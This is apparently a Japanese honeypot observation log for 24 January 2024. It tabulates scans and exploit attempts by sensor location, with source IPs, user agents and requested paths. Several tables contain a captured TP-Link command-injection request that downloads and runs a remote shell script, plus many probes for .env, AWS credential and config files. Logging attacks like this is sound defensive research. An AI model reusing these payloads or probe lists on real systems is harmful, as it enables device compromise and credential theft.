2024/01/24 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2024/01/24分です。

特徴

共通

zgrabによるスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為

Location:JP

TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス
CensysInspectによるスキャン行為
.cssへのスキャン行為
/.awsへのスキャン行為
configファイルへのスキャン行為
Gh0stRATのような動き

を確認しました。

Location:US

GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス
CensysInspectによるスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:UK

Joomla!の脆弱性(CVE-2023-23752)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス
ownCloud Graph APIの脆弱性(CVE-2023-49103)を狙うアクセス
curlによるスキャン行為
.cssへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
configファイルへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:SG

GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
PHPの脆弱性(CVE-2012-1823)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス
CensysInspectによるスキャン行為
.cssへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

他

アクセス数推移

JP：総アクセス数：170 (前日比：79)
US：総アクセス数：85 (前日比：-38)
UK：総アクセス数：404 (前日比：149)
SG：総アクセス数：131 (前日比：16)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	20.102.245.172	United States
1	45.56.108.128	United States
3	45.79.172.21	United States
32	52.80.0.169	China
85	52.80.229.231	China
1	64.62.197.62	United States
1	66.240.205.34	United States
2	78.153.140.175	Russia
1	121.173.126.195	South Korea
12	135.125.244.48	France
5	135.125.246.189	France
1	138.68.170.240	United States
1	146.190.108.121	United States
1	172.206.218.202	United Kingdom
3	184.105.139.70	United States
2	185.224.128.191	Netherlands
7	185.254.196.173	Ukraine
3	185.254.196.186	Ukraine
1	198.199.108.39	United States
1	198.199.114.5	United States
2	198.235.24.16	United States
2	198.235.24.88	United States
1	199.45.155.32	United States

UserAgent一覧

件数	UserAgent
12	`-`
2	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15`
85	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0`
60	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`Gh0st\xad`
1		`MGLNDD_18.179.20.5_80\n`
1		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x01\xfa\x01`
8		`\x16\x03\x01`
1	CONNECT	`www[.]naver[.]com:80`	HTTP/1.1
2	GET	`/.aws/credentials`	HTTP/1.1
2	GET	`/.env.development`	HTTP/1.1
2	GET	`/.env.dist`	HTTP/1.1
2	GET	`/.env.old`	HTTP/1.1
2	GET	`/.env.prod`	HTTP/1.1
2	GET	`/.env.production`	HTTP/1.1
2	GET	`/.env.project`	HTTP/1.1
2	GET	`/.env.save`	HTTP/1.1
31	GET	`/.env`	HTTP/1.1
1	GET	`/.json`	HTTP/1.1
1	GET	`/PHPConf.php`	HTTP/1.1
1	GET	`/_phpinfo.php`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
2	GET	`/admin-app/.env`	HTTP/1.1
1	GET	`/admin.php`	HTTP/1.1
1	GET	`/admin/phpinfo.php`	HTTP/1.1
2	GET	`/api/.env`	HTTP/1.1
2	GET	`/app/.env`	HTTP/1.1
2	GET	`/application/.env`	HTTP/1.1
2	GET	`/apps/.env`	HTTP/1.1
2	GET	`/back/.env`	HTTP/1.1
1	GET	`/cdn-cgi/trace`	HTTP/1.1
2	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20rm%20-rf%20%2A%3B%20wget%20http%3A%2F%2F104[.]168[.]5[.]4%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B.%2Ftenda.sh)`	HTTP/1.1
2	GET	`/cms/.env`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
2	GET	`/core/.env`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
2	GET	`/development/.env`	HTTP/1.1
3	GET	`/docker/.env`	HTTP/1.1
2	GET	`/enviroments/.env.production`	HTTP/1.1
2	GET	`/enviroments/.env`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fedex/.env`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/info/info.php`	HTTP/1.1
1	GET	`/info/phpinfo.php`	HTTP/1.1
1	GET	`/infophp.php`	HTTP/1.1
1	GET	`/information.php`	HTTP/1.1
1	GET	`/information`	HTTP/1.1
2	GET	`/laravel/.env`	HTTP/1.1
2	GET	`/live_env`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/media/system/js/core.js`	HTTP/1.1
1	GET	`/php-info.php`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
1	GET	`/php_info.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phpinformation`	HTTP/1.1
1	GET	`/phptest.php`	HTTP/1.1
1	GET	`/phpversion.php`	HTTP/1.1
1	GET	`/pinfo.php`	HTTP/1.1
2	GET	`/private/.env`	HTTP/1.1
1	GET	`/rest/.env`	HTTP/1.1
2	GET	`/script/.env`	HTTP/1.1
1	GET	`/scripts/phpinfo.php`	HTTP/1.1
2	GET	`/shared/.env`	HTTP/1.1
2	GET	`/sources/.env`	HTTP/1.1
2	GET	`/system/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/testphpinfo.php`	HTTP/1.1
1	GET	`/testphpinfo`	HTTP/1.1
1	GET	`/viewinfo.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wp-includes/css/buttons.css`	HTTP/1.1
1	POST	`/.aws/credentials`	HTTP/1.1
1	POST	`/.env.development`	HTTP/1.1
1	POST	`/.env.dist`	HTTP/1.1
1	POST	`/.env.old`	HTTP/1.1
1	POST	`/.env.prod`	HTTP/1.1
1	POST	`/.env.production`	HTTP/1.1
1	POST	`/.env.project`	HTTP/1.1
1	POST	`/.env.save`	HTTP/1.1
1	POST	`/.env`	HTTP/1.1
1	POST	`/admin-app/.env`	HTTP/1.1
1	POST	`/api/.env`	HTTP/1.1
1	POST	`/app/.env`	HTTP/1.1
1	POST	`/application/.env`	HTTP/1.1
1	POST	`/apps/.env`	HTTP/1.1
1	POST	`/back/.env`	HTTP/1.1
1	POST	`/cms/.env`	HTTP/1.1
1	POST	`/core/.env`	HTTP/1.1
1	POST	`/development/.env`	HTTP/1.1
1	POST	`/docker/.env`	HTTP/1.1
1	POST	`/enviroments/.env.production`	HTTP/1.1
1	POST	`/enviroments/.env`	HTTP/1.1
1	POST	`/laravel/.env`	HTTP/1.1
1	POST	`/live_env`	HTTP/1.1
1	POST	`/private/.env`	HTTP/1.1
1	POST	`/script/.env`	HTTP/1.1
1	POST	`/shared/.env`	HTTP/1.1
1	POST	`/sources/.env`	HTTP/1.1
1	POST	`/system/.env`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
5	3.129.45.136	United States
2	8.137.106.178	Singapore
1	45.79.172.21	United States
2	52.80.126.145	China
8	52.205.197.11	United States
8	54.36.115.221	France
7	54.37.79.75	France
1	64.62.197.7	United States
1	71.6.134.230	United States
2	78.153.140.177	Russia
1	80.66.88.215	Russia
2	83.97.73.245	Germany
8	95.214.235.169	Ukraine
1	103.133.111.217	Vietnam
1	139.59.101.104	Singapore
5	142.44.176.65	Canada
2	142.93.187.22	United States
2	162.142.125.13	United States
2	162.142.125.212	United States
2	162.142.125.224	United States
2	167.71.201.103	United States
2	167.71.207.184	United States
1	167.71.211.251	United States
2	170.64.130.197	United States
1	172.105.128.11	United States
1	178.128.171.63	United States
3	184.105.139.70	United States
1	185.180.143.136	Portugal
2	185.224.128.191	Netherlands
1	192.241.207.100	United States
1	198.199.108.7	United States
2	198.235.24.28	United States
2	198.235.24.65	United States
1	222.141.43.222	China

UserAgent一覧

件数	UserAgent
23	`-`
2	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; Android 5.1.1; KYF39 Build/100.0.2039; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0`
5	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
25	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko)`
1	`Mozilla/5.0 (iPad; CPU OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1`
1	`Mozilla/5.0 (iPad; U; CPU iPad OS 5_0_1 like Mac OS X; en-us) AppleWebKit/535.1+ (KHTML like Gecko) Version/7.2.0.0 Safari/6533.18.5`
3	`Mozilla/5.0 zgrab/0.x`
4	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`-`
1		`MGLNDD_34.68.118.83_80\n`
1		`\x03`
1		`\x16\x03\x01\x01H\x01`
2		`\x16\x03\x01\x01\x07\x01`
1		`\x16\x03\x01\x01\xfb\x01`
9		`\x16\x03\x01`
1	GET	`/.DS_Store`	HTTP/1.1
1	GET	`/.env.local`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
29	GET	`/.env`	HTTP/1.1
1	GET	`/.vscode/sftp.json`	HTTP/1.1
1	GET	`/99vt`	HTTP/1.1
1	GET	`/99vu`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Phpinfo/profiler`	HTTP/1.1
1	GET	`/Phpinfo`	HTTP/1.1
1	GET	`/Profiler`	HTTP/1.1
1	GET	`/aaa9`	HTTP/1.1
1	GET	`/aaaaaaaaaaaaaaaaaaaaaaaaaqr`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
6	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cf_scripts/scripts/ajax/ckeditor/ckeditor.js`	HTTP/1.1
2	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20rm%20-rf%20%2A%3B%20wget%20http%3A%2F%2F104[.]168[.]5[.]4%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B.%2Ftenda.sh)`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/gate.php`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/phpmyadmin/index.php`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.206.213	Russia
18	13.40.24.78	United States
3	13.201.104.115	United States
2	20.102.245.172	United States
8	38.242.222.177	United States
6	45.79.172.21	United States
1	45.79.181.223	United States
4	54.36.115.221	France
20	57.129.23.166	France
1	64.62.197.39	United States
1	64.62.197.40	United States
1	64.62.197.45	United States
2	83.97.73.245	Germany
23	90.151.171.106	Russia
85	90.151.171.108	Russia
1	93.42.124.2	Italy
8	95.214.235.169	Ukraine
3	118.123.105.93	China
30	120.199.82.50	China
1	139.59.101.104	Singapore
1	144.126.202.145	United States
154	155.248.212.175	United States
4	157.245.11.30	United States
1	162.243.134.9	United States
13	165.232.125.250	United States
2	167.71.202.190	United States
1	172.105.128.11	United States
1	184.105.139.68	United States
1	185.180.143.136	Portugal
2	185.224.128.191	Netherlands
1	198.199.108.33	United States
2	205.210.31.154	United States
2	205.210.31.239	United States

UserAgent一覧

件数	UserAgent
8	`'Cloud mapping experiment. Contact research@pdrlabs.net'`
116	`-`
2	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; Android 6.0.1; Redmi 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36`
4	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0`
4	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
11	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15`
1	`Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
47	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.46`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
20	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36`
25	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0`
12	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0`
6	`Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0`
29	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from) Z72612114222Q1`
29	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
8	`Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0`
4	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.166 Safari/537.36 OPR/20.0.1396.73172`
32	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36`
7	`Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0`
2	`Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0`
1	`Mozilla/5.0 zgrab/0.x`
3	`Mozilla/5.0`
1	`curl/8.1.2`

リクエスト内容一覧

件数	Method	Request	Protocol
50		`-`
1		`MGLNDD_132.145.66.34_80\n`
1		`SSH-2.0-libssh2_1.10.0`
1		`\x16\x03\x01\x01\x07\x01`
1		`\x16\x03\x01\x01\xfc\x01`
31		`\x16\x03\x01`
5	CONNECT	`api[.]ipify[.]org:443`	HTTP/1.1
5	CONNECT	`check.best-proxies[.]ru:443`	HTTP/1.1
4	CONNECT	`checkip[.]amazonaws[.]com:443`	HTTP/1.1
2	CONNECT	`eth0[.]me:443`	HTTP/1.1
3	CONNECT	`fingerprints[.]bablosoft[.]com:443`	HTTP/1.1
5	CONNECT	`ip[.]bablosoft[.]com:443`	HTTP/1.1
5	CONNECT	`v4[.]ident[.]me:443`	HTTP/1.1
1	GET	`/+CSCOE+/logon.html`	HTTP/1.1
1	GET	`/.DS_Store`	HTTP/1.1
1	GET	`/.__info.php`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.env.development%20`	HTTP/1.1
1	GET	`/.env.dist`	HTTP/1.1
1	GET	`/.env.old`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.production`	HTTP/1.1
1	GET	`/.env.project%20`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
33	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.info.php`	HTTP/1.1
1	GET	`/.json`	HTTP/1.1
1	GET	`/.vscode/sftp.json`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/0.0_phpinfo.php`	HTTP/1.1
1	GET	`/00_server_info.php`	HTTP/1.1
1	GET	`/02-info.php`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/1_1_PhpInfo.php`	HTTP/1.1
1	GET	`/5info.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?phpinfo=-1`	HTTP/1.1
1	GET	`/?phpinfo=1`	HTTP/1.1
1	GET	`/AwsConfig.json`	HTTP/1.1
1	GET	`/__info.php`	HTTP/1.1
1	GET	`/__tests__/test-become/.env`	HTTP/1.1
1	GET	`/_info-backoffice.php`	HTTP/1.1
1	GET	`/_info.php`	HTTP/1.1
1	GET	`/_phpinf.php`	HTTP/1.1
1	GET	`/_phpinfo.php`	HTTP/1.1
1	GET	`/_poopinfo.php`	HTTP/1.1
1	GET	`/_profiler/open?file=app/config/parameters.yml`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/_wpeprivate/config.json`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin-app/.env%20`	HTTP/1.1
1	GET	`/admin/index.html`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/api/index.php/v1/config/application?public=true`	HTTP/1.1
1	GET	`/app/.env%20`	HTTP/1.1
1	GET	`/app/config/parameters.yml`	HTTP/1.1
1	GET	`/app_dev.php/_profiler/open?file=app/config/parameters.yml`	HTTP/1.1
1	GET	`/app_dev.php/_profiler/phpinfo`	HTTP/1.1
1	GET	`/application/.env`	HTTP/1.1
1	GET	`/apps/.env%20`	HTTP/1.1
1	GET	`/aws.json`	HTTP/1.1
1	GET	`/awsconfig.json`	HTTP/1.1
1	GET	`/back/.env`	HTTP/1.1
1	GET	`/backup/`	HTTP/1.1
1	GET	`/blog/`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
2	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cf_scripts/scripts/ajax/ckeditor/ckeditor.js`	HTTP/1.1
1	GET	`/cgi-bin/login.cgi`	HTTP/1.1
2	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20rm%20-rf%20%2A%3B%20wget%20http%3A%2F%2F104[.]168[.]5[.]4%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B.%2Ftenda.sh)`	HTTP/1.1
1	GET	`/client_secrets.json`	HTTP/1.1
1	GET	`/cluster/cluster/`	HTTP/1.1
1	GET	`/cms/.env`	HTTP/1.1
1	GET	`/conf.json`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/config/config.json`	HTTP/1.1
1	GET	`/config/default.json`	HTTP/1.1
1	GET	`/config/parameters.yml`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/cp/.env`	HTTP/1.1
1	GET	`/credentials/config.json`	HTTP/1.1
1	GET	`/database-config.json`	HTTP/1.1
1	GET	`/db.json`	HTTP/1.1
1	GET	`/db/robomongo.json`	HTTP/1.1
1	GET	`/debug/default/view.html`	HTTP/1.1
1	GET	`/debug/default/view?panel=config/frontend_dev.php`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/debug/default/view`	HTTP/1.1
1	GET	`/deployment-config.json`	HTTP/1.1
1	GET	`/development/.env%20`	HTTP/1.1
2	GET	`/docker/.env`	HTTP/1.1
1	GET	`/env.json`	HTTP/1.1
1	GET	`/enviroments/.env.production`	HTTP/1.1
1	GET	`/enviroments/.env`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fedex/.env`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/frontend/web/debug/default/view`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/html/phpinfo.php`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/laravel/.env%20`	HTTP/1.1
1	GET	`/live_env%20`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/login.jsp`	HTTP/1.1
1	GET	`/logon.htm`	HTTP/1.1
1	GET	`/manage/account/login`	HTTP/1.1
1	GET	`/media/system/js/core.js`	HTTP/1.1
1	GET	`/new/`	HTTP/1.1
1	GET	`/old/`	HTTP/1.1
1	GET	`/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php`	HTTP/1.1
1	GET	`/parameters.yml`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phpmyadmin/index.php`	HTTP/1.1
1	GET	`/private/.env`	HTTP/1.1
1	GET	`/redmine/.env`	HTTP/1.1
1	GET	`/rest/.env`	HTTP/1.1
1	GET	`/robomongo.json`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sapi/debug/default/view`	HTTP/1.1
1	GET	`/script/.env`	HTTP/1.1
1	GET	`/sendgrid.json`	HTTP/1.1
1	GET	`/sftp-config.json`	HTTP/1.1
1	GET	`/shared/.env%20`	HTTP/1.1
1	GET	`/smtp.json`	HTTP/1.1
1	GET	`/sources/.env`	HTTP/1.1
1	GET	`/ssh-config.json`	HTTP/1.1
1	GET	`/symfony/public/_profiler/phpinfo`	HTTP/1.1
1	GET	`/system/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/temp/`	HTTP/1.1
1	GET	`/test/`	HTTP/1.1
1	GET	`/tool/view/phpinfo.view.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/user-config.json`	HTTP/1.1
1	GET	`/web/debug/default/view`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wordpress/`	HTTP/1.1
1	GET	`/wp-includes/css/buttons.css`	HTTP/1.1
1	GET	`/wp/`	HTTP/1.1
1	GET	`/ws-config.json`	HTTP/1.1
1	GET	`http[:]//132[.]145[.]66[.]34:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/SQL/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/dbadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysql-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysqladmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/php/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
